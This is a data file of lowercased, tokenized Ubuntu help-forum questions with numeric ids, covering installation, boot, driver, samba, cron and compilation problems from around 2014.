'yes , do as i say ! ' i did n't do it as i was n't sure about it . what can i do ? can it be solved ?
470953	how to install jdk 7 on ubuntu 12.04	i '' ve downloaded tar file from oracle server but i do n't know how to install it on my ubuntu linux system . could you please provide step by step details on how to install it ? thanks
470956	syslog time is not matching cron string setup	i am running many cronjobs in my server . when i was checking the syslog file to see the cron timing , it 's completely not matching . can someone help me to understand . syslog may 23 00:00:01 xxxxxx cron [ 20251 ] : ( root ) cmd ( php index.php cron_live country_fn ) may 23 00:00:01 xxxxxx cron [ 20252 ] : ( root ) cmd ( php index.php cron_live citynames_low_fn ) may 23 00:00:01 xxxxxx cron [ 20253 ] : ( root ) cmd ( php index.php cron_live bloggercontact ) may 23 00:00:01 xxxxxx cron [ 20268 ] : ( root ) cmd ( php index.php cron_live croncountrynames_high_fn ) may 23 00:00:01 xxxxxx cron [ 20271 ] : ( root ) cmd ( php index.php cron_live googleplus_state_fn ) may 23 00:00:01 xxxxxx cron [ 20272 ] : ( root ) cmd ( php index.php cron_live facebook_state_fn ) may 23 00:00:01 xxxxxx cron [ 20269 ] : ( root ) cmd ( php index.php cron_live googleplus_country_fn ) may 23 00:00:01 xxxxxx cron [ 20244 ] : ( munin ) cmd ( if [ -x /usr/bin/munin-cron ] ; then /usr/bin/munin-cron ; fi ) may 23 00:00:01 xxxxxx cron [ 20277 ] : ( root ) cmd ( php index.php cron_live croncitynames_high_fn ) i sets the 00 2,5,8,11,14,17,20,23 * * * cron string to googleplus_country_fn job . which means it should execute ( 2am , 5am , 8am , 11am , 2pm , 5pm , 8pm , 11pm ) times only . but syslog show it ran on may 23 00:00:01 xxxxxx cron [ 20269 ] . what is that syslog time is that starting time or ending or running time . can someone help me to understand . edit : - full cron setup 00 2,5,8,11,14,17,20,23 * * * php index.php cron_live googleplus_country_fn
470957	what are differences in ubuntu c++ programming and windows c++ programming ?	the getch ( ) function has to be replaced by getchar ( ) in g++ ( or any other compiler for that matter ) for successful compilation . i am new to ubuntu , so i would like to know what are the other possible changes i need to work on when i start programming in here ( i am going to use geany ) .
470958	notify-send not working on 14.04 , but volume and brightness notifications do	i have browsed around here and googled for over an hour , but are no closer to a solution , so here goes . lets start by killing /usr/lib/x86_64-linux-gnu/notify-osd . i then do notify-send `` foo '' and it reappears , but nothing shows . kill it again , but then change volume or brightness , and it reappears and the notification shows . i have also tried using the python pynotify library , and the display=:0 trick , just in case , but it makes no difference . i have verified that notification-daemon is not istalled , and reinstalled libnotify-bin and libnotify4 . the output of dpkg -l | grep -i notify is gir1.2-notify-0.7 libnotify-bin libnotify4 : amd64 notify-osd notify-osd-icons python-notify this is on a fairly fresh install of 14.04 , no particular mods . i have no idea what to try next . if you do , please speak up ! : - ) edit : i see that i was not clear about this when i posted this question , but this is an intermittent problem . notifications stops or starts working seemingly of it 's own . i have not been able to perceive a pattern to it . none of the obvious . i tried all the standard purging and reinstalling procedures but that made no difference . i have a tiny suspicion that my video setup might have something to do with this , as i have an nvidia optimus card that i have not been able to set up quite to my satisfaction despite trying rather hard . perhaps if some compositing `` eye candy '' feature is used and that feature is not dependable , that may explain the behaviour i 'm seeing .
470959	booting multiple operating systems , does install order matter ?	i 'm moving my computer from a dual boot ( windows 7 , ubuntu 14.04 ) to a triple boot ( windows 7 , ubuntu 14.04 , mac os x 10.9 ) . i currently use grub to start up my computer into either windows or ubuntu . i 've done dual boot installs about 5 times on 2 different machines in the past , but i 've never had the booting work through grub . normally i have to use windows ' boot menu . i 'm not sure , but i think it had something to do with the order i installed the os ' in ( windows , then ubuntu ) . so essentially , what order should i install my operating systems in in order to use grub as my boot menu ? the partitioning is windows 7 on a 128gb ssd by itself , and another 128gb ssd drive split between ubuntu and mac . i know this is a ubuntu-based q & a board ( did n't know where else to put it ) so what i 'm looking for is information on what ubuntu does to the boot process when it is installed .
470960	nas running ubuntu / raid 5 / ssd cache	i 'm about to setup a nas - planned hardware so far : mb : asus p9d ws ( *link1 ) : sry , it 's german , it says th mb supports hot-plug in ahci or raid mode , supports intel smart response ( ssd caching ) cpu : intel core i5-4570te processor ( first i thought about intel xeon processor e3-1220l v2 , but i could not find any 1155 sockel mb with 6x sata iii interfaces / just 3x sata iii ) hdd : 3x wd30efrx ( *link2 ) ( western digital red 3tb ) - i 'm pretty sure this disk supports hot swapping as it was designed for nasusage ram : not sure yet , something like crucial dimm 4gb , ddr3l-1600 , cl9 , ecc the ( hd ) hot swapping function with an ubuntu raid5 system is possible , if the hw allows it . link just one open question left ( not at all ubuntu related - maybe somebody knows it though ) : how much ssd space is necessary to make the cache useful ? thanks for your inputs ; - ) *link1 : future-x.de/asus-p8z77-ws-mainboard-atx-lga1155-socket-z77-usb-30-2-x-gigabit-lan-onboard-grafik-hd-audio-8-kanal-p-71172/ *link2 : wdc.com/wdproducts/library/specsheet/eng/2879-771442.pdf
470962	error accessing files through samba , cifs-utils and smbclient	i have strange errors trying to access files shared in our corporate windows network . it started yesterday . first , i was n't able to copy shared iso image to my local directory : download stopped at first 91.5 mb ( file size is ~3gb ) . also , the copying window froze . lesser files were read without problem . i reinstalled cifs-utils and mounted share manually ( i used autofs before ) : sudo mount.cifs -o credentials=/root/.credentials //server/share /mnt but i got the same behaviour of copy window and cp . so i reinstalled samba-common purging configuration files . it fixed problem with sharing my files , but did not fix the mentioned problem . now , when i try to copy another large file , it does n't start at all and freezes again . ok , let 's try smbclient : $ sudo smbclient -a /root/.credentials //infomrk/install domain= [ zaomrk ] os= [ unix ] server= [ samba 3.6.23 ] smb : \ > ... smb : \programmers\language\embarcadero rad studio xe2\ > get delphicbuilder_xe2_4316_win_dl.iso /home/karimov-danil/install/delphicbuilder_xe2_4316_win_dl.iso parallel_read returned nt_status_io_timeout my /var/log/samba/log.winbindd : $ tail -20 /var/log/samba/log.winbindd [ 2014/05/23 12:06:42.320867 , 0 ] ../source3/winbindd/winbindd.c:1204 ( winbindd_register_handlers ) unable to initialize domain list [ 2014/05/23 12:06:42 , 0 ] ../source3/winbindd/winbindd.c:1453 ( main ) winbindd version 4.1.6-ubuntu started . copyright andrew tridgell and the samba team 1992-2013 [ 2014/05/23 12:06:42.389438 , 0 ] ../source3/winbindd/winbindd_cache.c:3196 ( initialize_winbindd_cache ) initialize_winbindd_cache : clearing cache and re-creating with version number 2 [ 2014/05/23 12:06:42.391433 , 0 ] ../source3/winbindd/winbindd_util.c:634 ( init_domain_list ) could not fetch our sid - did we join ? [ 2014/05/23 12:06:42.391535 , 0 ] ../source3/winbindd/winbindd.c:1204 ( winbindd_register_handlers ) unable to initialize domain list [ 2014/05/23 12:06:42 , 0 ] ../source3/winbindd/winbindd.c:1453 ( main ) winbindd version 4.1.6-ubuntu started . copyright andrew tridgell and the samba team 1992-2013 [ 2014/05/23 12:06:42.457973 , 0 ] ../source3/winbindd/winbindd_cache.c:3196 ( initialize_winbindd_cache ) initialize_winbindd_cache : clearing cache and re-creating with version number 2 [ 2014/05/23 12:06:42.804879 , 0 ] ../source3/winbindd/winbindd_util.c:634 ( init_domain_list ) could not fetch our sid - did we join ? [ 2014/05/23 12:06:42.805072 , 0 ] ../source3/winbindd/winbindd.c:1204 ( winbindd_register_handlers ) unable to initialize domain list can somebody point me out what should i do now and how do i quick resolve this problem ? upd : somehow i found that switching to internal network adapter ( nvidia corporation mcp61 ethernet ( rev a2 ) ) resolves problem but i 'd like to use default one ( 3com corporation 3c905c-tx/tx-m [ tornado ] ( rev 74 ) ) .
470964	installing ubuntu 14 - scrambled screen / display issues	when i attempt to boot into ubuntu 14 , i 'm able to get all the way into the gui w/o issue.. but once i 'm there , the background is corrupted ( black/white stripe/block images ) as is anything `` inside '' a window ( the window chrome is fine however ) . i can see the navigation bar and menu bars , but any dropdown windows are also corrupted . it does n't matter if i 'm booting up to `` try '' ubuntu 14 , or install it . complete power-down ( vs reboot from windows 8 ) does n't seem to make any difference either . system specs : msi mainboard , z77 chipset ( onboard intel gfx disabled in bios ) core i5-3750k ( stock clock ) , 16gb ram *2x msi twinfrozr 7870 's ( amd radeon hd7870 's ) 3x monitors - 2x asus vs239 's , 1x lenovo l2321 ( rotated 90 degrees ) . 320gb samsung ssd 2x wd 1tb hdd *the video cards are not in crossfire mode ( bridge is not attached ) .. actually , there 's nothing connected to the second card at all at the moment . i would attach screenshots for reference.. but i do n't have a high enough reputation to do so ... you can find them here : corrupted screen images i 'd appreciate any pointers y'all might have . thanks !
470966	shortcut to clear command line terminal	is there a shortcut to clear the command line when typing in it instead of keeping backspace pressed for a few long seconds ? i ask because i regularly use the tab key to automatically fill in file names when using bash commands in the terminal . for example instead of typing cd this_is_a_long_file_name , i will type cd th < tab > . but then i realize i have filled in the wrong command/filename and i have to hold down backspace to clear everything and repeat the process .
470967	java not working in google chrome lubuntu 14.04 ( 32-bit )	i have java 1.7.0_55 installed i have gotten it to work on firefox . my installed chrome version is version 35.0.1916.114 . i have already created the plugins folder in the chrome directory and made a symbolic link to libnpjp2.so within the chrome plugins folder , restarted the browser and java is still not working . how do i fix this ?
470973	how can i compile libmtp in ubuntu	i get the following error ( s ) when i try to compile mtp . how can i resolve it please ? script started on fri 23 may 2014 12:12:26 am pdt sansari @ ubuntu : ~/local/src/libmtp-1.1 .3 $ sudo make [ sudo ] password for sansari : make all-recursive make [ 1 ] : entering directory `/home/sansari/local/src/libmtp-1.1.3' making all in src make [ 2 ] : entering directory `/home/sansari/local/src/libmtp-1.1.3/src' make [ 2 ] : nothing to be done for `all ' . make [ 2 ] : leaving directory `/home/sansari/local/src/libmtp-1.1.3/src' making all in examples make [ 2 ] : entering directory `/home/sansari/local/src/libmtp-1.1.3/examples' /bin/bash ../libtool -- tag=cc -- mode=link gcc -g -o2 -wall -wmissing-prototyp es -o mtp-connect connect.o delfile.o getfile.o newfolder.o sendfile.o sendtr . o pathutils.o util.o ../src/libmtp.la libtool : link : gcc -g -o2 -wall -wmissing-prototypes -o .libs/mtp-connect connec t.o delfile.o getfile.o newfolder.o sendfile.o sendtr.o pathutils.o util.o ../s rc/.libs/libmtp.so ../src/.libs/libmtp.so : undefined reference to `get_usb_device_timeout' ../src/.libs/libmtp.so : undefined reference to `libmtp_detect_raw_devices' ../src/.libs/libmtp.so : undefined reference to `get_playlist_extension' ../src/.libs/libmtp.so : undefined reference to `ptp_usb_event_wait' ../src/.libs/libmtp.so : undefined reference to `set_usb_device_timeout' ../src/.libs/libmtp.so : undefined reference to `guess_usb_speed' ../src/.libs/libmtp.so : undefined reference to `configure_usb_device' ../src/.libs/libmtp.so : undefined reference to `dump_usbinfo' ../src/.libs/libmtp.so : undefined reference to `close_device' collect2 : ld returned 1 exit status make [ 2 ] : *** [ mtp-connect ] error 1 make [ 2 ] : leaving directory `/home/sansari/local/src/libmtp-1.1.3/examples' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/sansari/local/src/libmtp-1.1.3' make : *** [ all ] error 2 sansari @ ubuntu : ~/local/src/libmtp-1.1 .3 $ exit script done on fri 23 may 2014 12:12:45 am pdt
470978	how to enable virtualization on lenovo z500 ?	i have downloaded the kernel 3.13.6 from kernel.org and installed in the system . updated the bios and then enabled the virtualization in the bios settings . now i have used the command sudo kvm-ok to check if virtualization is enabled , but it gives following : ( info : /dev/kvm does not exist hint : sudo modprobe kvm_intel info : your cpu supports kvm extensions kvm acceleration can be used what else can i do in order to enable virtualization ? ?
470982	how to add a python module to syspath ?	hi i have a file structure like this folder common foo1.py testfolder foo2.py i want to import in foo2.py foo1.py . i tried but it doesn`t work on ubuntu : sys.path.append ( os.path.abspath ( '../../ ' ) ) from common import foo1.py
470986	ubuntu emulator does n't output audio	first the boot process showed me this warning : emulator : warning : opening audio output failed then i installed these packages : sudo apt-get install libpulse-dev libpulse-dev : i386 libpulse0 no it longer produces the error , but i still ca n't hear any sounds like ringing tones .
470987	i ca n't give more sound in ubuntu 12.04	i am facing sound problem in ubuntu 12.04 . i switched completely to ubuntu 12.04 everything is fine instead when i play any track or video , the visual performance is good but the sounds flickers always and when i try to increase the volume it starts to flicker more . i checked my hardware , hardware drivers etc .
470994	compile and install modified kernel	i have made some changes to the vmx.c file of the kernel . now i am using make menuconfig followed by make -j 5 command to compile the modified kernel ( no errors just a warning.. ) now i am using the sudo dpkg -i ../linux*.deb to install the kernel . after installation , when i reboot and start the machine again and check the kernel version by using uname -a it shows that the o.s is using the old kernel but not the newly compiled and installed modified kernel . where am i going wrong ? i donot see any new options in grub . they are the same old options , should i see a new option in grub ( something like boot with new kernel ? ) if my modified kernel got installed properly ? kindly help me in this . thanks in advance .
470996	how to install ubuntu on my macbook air ?	hi i want to install ubuntu 12.04 or the latest version in my macbook air . i had formatted my hard drive and there is no other os 's installed , so how i can install ubuntu on mac directly . i also tried fedora 12 its working directly but i want use ubuntu on it.. please help and let me know which version of iso should i download for my mac in complete detail.. thanks
471001	is there a shortcut for long folder paths in terminal ?	i 've just started using ubuntu 14.04 since yesterday so i 'm quite a newb as you can imagine . thing is i was wondering if there is anything out there that helps one shorten the paths to specific files in terminal e.g like gitbash here in windows which opens a terminal with the path already set to the folder u opened it from . so , is there something like that ? thanks , taerus .
471002	install php5-curl without upgrading php-cli	i am using imageantialias for php and php -r `` var_dump ( function_exists ( 'imageantialias ' ) ) ; returns bool ( true ) i do have requirement for php5-curl , and if i install php5-curl using php5-curl ( sudo apt-get install php5-curl ) , it updates my mentioned packages then imageantialias returns false . php -r `` var_dump ( function_exists ( 'imageantialias ' ) ) ; returns bool ( false ) i am running ubuntu 12.04 , apache2 2.2.22 php5 5.3.10
471005	the system is running in low graphics mode , can not open grub	i have installed ubuntu 14.04 lts on hp pavilion laptop . i am getting this error and unable to get into desktop . i have tried this `` how to fix `` the system is running in low-graphics mode '' error ? '' method but no matter what i do i can not open grub menu neither can i fix this issue . i believe i took wrong decision to shift from windows to ubuntu just for being open source . i completely formatted oem windows 8 and now i am left with dead laptop . note : i can not log into any menu so i can enter any commands , all i see is tty1 menu ( black screen command promt style )
471006	weird font size setting in different apps and random places	ever since the update from 13.10 to 14.04 i have a font-size issue . for example . with evolution email the email will show in extremely large font-size ( ~18px ) while the folders and menu 's are displayed in normal font-size the same goes for bluefish , directory and menu are displayed in normal font-size , while the edited file is displayed in extremely small font-size ( < 6px ) today i noticed a similar behavior in mysql workbench . here the menu is displayed in extremely small font-size , while models and shortcuts are displayed normal . i believe the only common item here is gtk . does anybody have a solution for this ? or can confirm this !
471009	where are the settings for 'iwconfig ' stored ?	i 'm going to be fiddling around with my wireless card 's settings by using iwconfig . before doing this , i would like to back up my current settings in case anything goes horribly wrong . where are the config options for iwconfig stored so i can back them up , and restore them when needed ?
471012	ubuntu 14.04 lts fails to start with a kernel panic	these errors occur while starting ubuntu . i am dual booting windows 8.1 with ubuntu . kernel panic - not syncing : fatal exception in interrupt . shutting down cpus with nmi drm_kms_helper : panic occurred , switching back to text console . nothing happens and ubuntu freezes .
471013	ubuntu resize just the launcher	in older versions of ubuntu you used to be able to scale down the size of the launcher , but now i have installed ubuntu 14.04 , and that option in the gui was changed . it now scales down/up every element of the interface . is there any way i could maybe edit some file or something , in order to only reduce the size of the launcher ?
471024	no brightness control in brightness & lock menu	i have ubuntu 12.04 lts 32bit in my dell latitude e5530 with intel core i5 and graphics of intel速 ivybridge mobile x86/mmx/sse2 . i can change brightness with fn buttons but screen brightness reset to maximum after every reboot . there is no brightness control in brightness & lock menu . grub_cmdline_linux_default= '' quiet splash acpi_backlight=vendor '' why is n't there the brightness slider in menu ?
471028	kvm virtual machine manager : host cpu does not provide required features : aes	i am using ubuntu 12.04 64-bit . i am using openstack . the service is all working , but nova service is not working . some got error is : hardware not supported , so i changed processor - > configuration - > module - > westmere , but start the vm , some got error message : error starting domain : unsupported configuration : guest and host cpu are not compatible : host cpu does not provide required features : aes
471029	video is not running in my ubuntu 14.04 lts	video is not running in my ubuntu 14.04 lts . when i run it , it says `` the application videos has closed unexpectedly . '' and shows like the following image . what should i do now ?
471032	recommended ubuntu version	i need compatible ubuntu version no . to install on the following configuration cpu p4- 512mb ram 300 mhz clock frequ
471037	is the silverlight downloads on ubuntu safe to use ( mokeke.sytes.com )	i would like to know whether the silverlight alternatives available at ( http : //mokeke.sytes.net/downloads/linux/novell_moonlight/ ) is safe to use ? novell-moonlight-3.99.0.3-x86_64.crx for chrome novell-moonlight-3.99.0.3-x86_64.xpi for ff
471038	sharing fat partition on external ssd setup with windows	i am having a problem getting some storage space . let me start by saying i am running ubuntu 14.04lts on a external solid state hard drive so i can access my work from multiple computers . i partitioned the total 65gb hd into 3 sections . 55gb for ubuntu ( ext3 file system ) . 5gb swap space . and the last section i made roughly 3gb of fat space in the attempt to be able to back up my spreadsheets and address lists on this space and have access to the them via a windows computer as if it was just a 3gb thumb stick however when i plug it into windows it tells me the drive is broken and needs to be formatted . my question is , can this be done so that windows will recognize the 3gb fat32 partition as just a hard drive and ignore the linux partition 's ?
471042	xml2 installed but not found during compilation	i 'm trying to compile the lib https : //github.com/bjz/gl-rs . i 'm getting an error when running make : error : linking with `cc` failed : exit code : 1 ( a long list of linker args follows ) note : /usr/bin/ld : can not find -lxml2 if i 'm reading this right , the linker can not find the lib xml2 . i made sure xml2 and libxml2 are installed ( via sudo apt-get install ) but that 's not enough . what to do ?
471043	where is the system logs and recent entries	i want to get system login logs in ubuntu 12.04 lts for last month as well as history like windows system.please guide & help . jyoti
471045	14.04 doesnt have package imagemagick	usually i had installed image magick on my ubuntu systems with a command like this sudo apt-get install imagemagick or like this : sudo apt-get install php5-imagick right now i am running the latest 14.04 , and those packages seem to have disappeared from the repositories . am i missing something ? have they been obsoleted ? how could i install imagemagick now ?
471048	ubuntu server 14.04 lts - default gateway and dns different to laptop network settings	i have been having trouble setting my ubuntu server network settings . both my laptop and server are connected to my home router , laptop via wifi and router via ethernet , router address is 192.168.1.1 from my laptop i 'm using putty to log in to the server . so when i do an ipconfig /all on my laptop it says my default gateway and dns are both 192.168.1.1 . when i ping www.google.ie from my laptop it works fine . the trouble i was having was that when i had these settings in the /etc/network/interfaces file on the server i could ping 8.8.8.8 and it worked fine but when i ping www.google.ie it would throw a dns error . so i logged into my router and found its default gateway and dns addresses 192.168.0.1 and entered them into the /etc/network/interfaces file and it fixed my problem . yeay ! but now i want to know why my default gateway and dns addresses on my laptop are different to that on the server . also when i ping from the server to www.google.ie it lags for a few seconds and then works . i know it has something to do with the dns lookup but i do n't know how to fix it . server : default gateway 192.168.0.1 dns-nameserver 192.168.0.1 laptop : default gateway 192.168.1.1 dns-nameserver 192.168.1.1 server is set up to have a static ip address and laptop is using dhcp .
471050	problems in installation of postgresql	i got following error while installing postgresql client the following packages have unmet dependencies : postgresql-9.3 : depends : postgresql-client-9.3 but it is not going to be installed depends : postgresql-common ( > = 142~ ) but it is not going to be installed e : unable to correct problems , you have held broken packages . so how should i fix it ? thanks
471052	ubuntu crashes after upgrade to 13.10 , laptop wo n't boot anymore	i have a hp pavilion dv7 , with windows 7 and ubuntu 13.04 in dualboot . just recently i updated to 13.10 , but there were some packages that did n't get installed properly , i thought this would n't be such a problem . when i tried to boot my freshly updated ubuntu this morning , suddenly about 5 minutes in , my launcher and menu bar disappeared out of nowhere , leaving me unable to do anything , since i could n't even open a terminal using the shortcut . i did a hard reset , rebooted and had the exact same problem . so i did a hard reset , rebooted in recovery mode and tried to fix the broken packages using the 'dkpg ' option . this did n't do very much ad i waited an hour and nothing happened . i could type but not cancel the command or give any other command . i saw no other option than to do het another hard reset . when trying to reboot , my laptop now gives no reaction at all . as in nothing . the ligt does n't even go on , the screen remains black , nothing happens . i thought this might be because i did too many hard resets , but i have no idea whether this could be possible . since i am a computer science student with upcoming finals this is a very urgent matter for me , and i have no idea what i could do next . thank you for your time and i hope you can help me out .
471065	ubuntu 14.04 stuck at loading	i have a dual boot dell inspiron 5423 laptop . suddenly it is stuck at loading on ubuntu 14.04 at the purple screen ) . the output after pressing the esc key is as follows : it gets stuck at starting cups printing spooler/server update : at boot screen i pressed ctrl+alt+f3 and logged in and restarted lightdm : service lightdm restart i have to do the same step every time to login .
471068	error in installing matlab	i haver tried to download matlab programm to my ubunto , but the installation was stop , and matlab interface configuration appear , and it ask me to enter location of matlab installation , so my question is : what i have to write in this location ?
471072	stuttering visuals	not sure if this is the correct place to ask for this kind of help , but i am getting stuttering visuals from time to time and ca n't deduce the reason . i bought/build my pc about two-three months ago so it 's quite new . did n't buy a separate gpu , since i did n't think i 'd need any . i am using ubuntu 14.04 ( upgraded from 12.04 last month ) . most of the time cpu usage is about 15-30 % on all four cores , memory usages is about 15-20 % and i 'm using an ssd internal disk . with these numbers i would n't expect to have much lag from anything , when just browsing the web , yet at random times the pc seems to stutter or freeze for a sec . for example something opening the file browser goes fast , other times it goes fast , i have had gif files playing fine , but then randomly slow down . the most noticable thing that i think should n't be happening is when i am typing a large text like i 'm doing now and the letters showing slows down . typing should n't result in much delay should n't it ? it 's like the computer is having hiccups at random occasions , but i ca n't track down why . i did n't have this problem before and i just started noticing it recently . did it start when i upgraded to 14.04 ? another example would be when i used compizconfig manager again after updating , every time i changed a setting it would freeze the screen for a few minutes before working again . this problem has gone away now . i also tried using other lightweight desktops , thinking that maybe that would make a difference , but the problem was still there . so basically i have tried random , probably unrelated stuff , wasting my time not knowing where to start looking . i 'm thinking of just downloading and reinstalling 14.04 from scratch since i 'm working with an upgraded version of 12.04 now , hoping this will fix things , but before i do something that drastic , does anybody know how i could possibly track the problem down ? i do n't believe a quadcore computer with enough ram would possible stutter when typing a text like this ... the thing is that the problem just suddenly appeared , while the computer had been working perfectly for a month or two . did i maybe install something i should n't have ? or might some hardware be malfunctioning maybe ? i do n't know . hope anybody can point me in the direction or can help me out . that would be much appreciated . edit : user @ pc : /var/log $ cat syslog | grep -i warning may 23 13:45:50 pc gnome-session [ 16809 ] : warning : application 'compiz.desktop ' killed by signal 11 may 23 13:45:50 pc gnome-session [ 16809 ] : warning : app 'compiz.desktop ' respawning too quickly user @ pc : /var/log $ cat syslog | grep -i error may 23 13:45:50 pc kernel : [ 13458.470094 ] compiz [ 17051 ] : segfault at 0 ip 00007f0e7659a000 sp 00007fffea049940 error 6 in libunityshell.so [ 7f0e76260000+53c000 ] user @ pc : /var/log $ cat kern.log | grep -i `` may 23 '' | grep -i warning may 23 10:01:34 pc kernel : [ 0.000000 ] acpi bios warning ( bug ) : optional fadt field pm2controlblock has zero address or length : 0x0000000000000000/0x1 ( 20131115/tbfadt-603 ) may 23 10:01:48 pc kernel : [ 17.506884 ] deprecated_sysctl_warning : 168 callbacks suppressed may 23 10:01:48 pc kernel : [ 17.506889 ] warning : process `vmware-hostd ' used the deprecated sysctl system call with 1.1. user @ pc : /var/log $ cat kern.log | grep -i `` may 23 '' | grep -i error may 23 10:01:34 pc kernel : [ 2.356186 ] nct6775 : probe of nct6775.656 failed with error -16 may 23 10:01:34 pc kernel : [ 2.933570 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro may 23 13:45:50 pc kernel : [ 13458.470094 ] compiz [ 17051 ] : segfault at 0 ip 00007f0e7659a000 sp 00007fffea049940 error 6 in libunityshell.so [ 7f0e76260000+53c000 ] user @ pc : ~ $ cat /var/log/xorg.0.log | grep -i warning ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 16747.020 ] ( ww ) warning , could n't open module ati [ 16747.020 ] ( ww ) warning , could n't open module modesetting [ 16747.020 ] ( ww ) warning , could n't open module fbdev [ 16747.021 ] ( ww ) warning , could n't open module vesa [ 16747.021 ] ( ww ) warning , could n't open module ati [ 16747.021 ] ( ww ) warning , could n't open module modesetting [ 16747.022 ] ( ww ) warning , could n't open module fbdev [ 16747.022 ] ( ww ) warning , could n't open module vesa peter @ pc : ~ $ cat /var/log/xorg.0.log | grep -i error ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 16747.587 ] ( ee ) aiglx error : failed to open /usr/x11r6/lib64/modules/dri/fglrx_dri.so , error [ /usr/x11r6/lib64/modules/dri/fglrx_dri.so : can not open shared object file : no such file or directory ] [ 16747.587 ] ( ee ) aiglx error : failed to open /usr/lib64/dri/fglrx_dri.so , error [ /usr/lib64/dri/fglrx_dri.so : can not open shared object file : no such file or directory ] [ 16747.587 ] ( ee ) aiglx error : failed to open /usr/x11r6/lib/modules/dri/fglrx_dri.so , error [ /usr/x11r6/lib/modules/dri/fglrx_dri.so : can not open shared object file : no such file or directory ] additional drivers says : advanced micro devices , inc. [ amd/ati ] : richland [ radeon hd 8570d ] using video driver for the amd graphics accelerators from fglrx ( proprietary )
471073	desktop screen is running slow for ubuntu 12.04	i have installed ubuntu 12.04 on my system . but screen of the system is running very slow . i checked the cpu utilization but it is normal less than 15 % . here is specifications vga kernel driver command used *lspci -nnk | grep -i vga -a3* output 00:02.0 vga compatible controller [ 0300 ] : intel corporation 3rd gen core processor graphics controller [ 8086:0166 ] ( rev 09 ) subsystem : intel corporation device [ 8086:2044 ] kernel driver in use : i915 kernel modules : i915 sudo hdparm -tt /dev/sda /dev/sda : timing cached reads : 8588 mb in 2.00 seconds = 4296.35 mb/sec timing buffered disk reads : 1090 mb in 3.00 seconds = 363.26 mb/sec how can i resolve this issue let me know if any thing needed .
471077	gimp options on unity panel greyed out unless sudo	i 'm using gimp2.8-2.9 on 13.10 and all of the drop-down options to modify a photo from the unity panel menu are greyed out unless gimp is run as sudo . i can only assume this is a permission issue . gimp should n't have to be run with sudo . update right-clicking on the photo has the same options available i just can not use the drop-down menu items from the unity panel for some reason . mchid @ mchid : ~ $ ls -l .gimp-2.8 total 824 drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 brushes -rw -- -- -- - 1 mchid mchid 739 may 23 08:29 colorrc -rw -- -- -- - 1 mchid mchid 1863 may 23 08:29 controllerrc drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 curves -rw -- -- -- - 1 mchid mchid 57 may 23 08:29 dockrc drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 dynamics drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 environ drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 fonts drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 fractalexplorer drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 gfig drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 gflare drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 gimpressionist drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 gradients -rw-r -- r -- 1 mchid mchid 430 may 23 08:28 gtkrc drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 interpreters -rw-r -- r -- 1 mchid mchid 2597 may 23 08:28 lastval_descriptions.txt drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 levels -rw-r -- r -- 1 mchid mchid 99367 may 23 08:29 menurc drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 modules drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 palettes -rw -- -- -- - 1 mchid mchid 102 may 23 08:29 parasiterc drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 patterns -rw-r -- r -- 1 mchid mchid 541388 may 23 08:28 pluginrc drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 plug-ins drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 scripts -rw -- -- -- - 1 mchid mchid 2493 may 23 08:29 sessionrc -rw-r -- r -- 1 mchid mchid 53885 may 23 08:29 tags.xml -rw -- -- -- - 1 mchid mchid 4817 may 23 08:29 templaterc drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 templates -rw-r -- r -- 1 mchid mchid 306 may 23 08:28 themerc drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 themes drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 tmp drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 tool-options drwxr-xr-x 2 mchid mchid 4096 may 23 08:28 tool-presets -rw -- -- -- - 1 mchid mchid 3996 may 23 08:29 toolrc -rw -- -- -- - 1 mchid mchid 1178 may 23 08:29 unitrc thank you in advance . i have no idea why but all of the options from the unity panel menu are greyed ( unless sudo ) out but the same options are available by right-clicking on the image .
471079	while installing ubuntu desktop 14.04 error coms that says no child node.. aborted	i used pendrive to make my usb stick bootable , and then i changed my bios to launch from usb 2.0 but when it boots now it comes up saying `` no child node detected . '' any ideas ?
471083	wine issues with installing	i ca n't install wine 1.6 on my 14.04 ubuntu install . i get the following error : the following packages have unmet dependencies : wine1.6 : depends : wine1.6-i386 ( = 1:1.6.2-0ubuntu4 ) but it is not installable e : unable to correct problems , you have held broken packages .
471090	using mobile phone 's internet through bluetooth	how can i connect to a mobile phone through a bluetooth connection to use the mobile phone 's internet connection ?
471091	what is the `` browser '' process ?	what is the browser process ? is the process safe or malicious ? thanks for help , top results :
471093	error in installation of matlab	i have an error that show at the end of installation of matlab by this command : sudo apt-get install matlab-gdf dynare-matlab libpdl-io-matlab-perl matlab-support matlab-support-dev matlab2tikz . and the details of error is : processing 12 added doc-base files ... error in /usr/share/doc-base/pdl ' , line 14 : allformat ' sections are invalid . note : `install-docs -- verbose -- check file_name ' may give more details about the above error . processing triggers for fontconfig ( 2.11.0-0ubuntu4 ) ... processing triggers for bamfdaemon ( 0.5.1+14.04.20140409-0ubuntu1 ) ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for desktop-file-utils ( 0.22-1ubuntu1 ) ... processing triggers for gnome-menus ( 3.10.1-0ubuntu2 ) ... processing triggers for mime-support ( 3.54ubuntu1 ) ... processing triggers for hicolor-icon-theme ( 0.13-1 ) ... processing triggers for install-info ( 5.2.0.dfsg.1-2 ) ... errors were encountered while processing : man-db e : sub-process /usr/bin/dpkg returned an error code ( 1 ) . so could this error solves without re-installing the program ?
